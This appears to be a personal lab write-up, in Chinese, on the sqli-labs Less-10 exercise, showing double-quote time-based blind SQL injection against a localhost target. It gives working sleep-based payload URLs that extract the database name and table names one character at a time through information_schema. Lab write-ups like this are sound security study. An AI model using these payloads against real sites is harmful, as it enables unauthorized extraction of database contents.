基于双引号的时间盲注
先来随便测试一下 发现 错不错都是返回的真确的结果
那么应该是被从定向了 我们可以输入
and sleep(5) %23 测试
加’发现立刻返回 加双引号发现报错了 过了5秒才返回 那么这不是加入”的时间盲注吗?
我们进行测
http://127.0.0.1/sql1/Less-10/?id=1%22%20and%20sleep(5)%20%23
好像真的是
0X01爱之初体验 爆库名
http://127.0.0.1/sql1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E116,0,sleep(5))%20%23
116返回错误
http://127.0.0.1/sql1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E114,0,sleep(5))%20%23
114返回真确
那么第一个字母就是115了
0X02爱之在试探
爆表名
http://127.0.0.1/sql1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),1,1))%3E100,0,sleep(5))%20%23
立刻回显 那么执行结果为正确
就用这个思路一直跑下去
然后接着爆列名 字段
这里还是以后来写脚本吧 现在python还没有学完
切记 学习之路 少就是多 ,慢就是快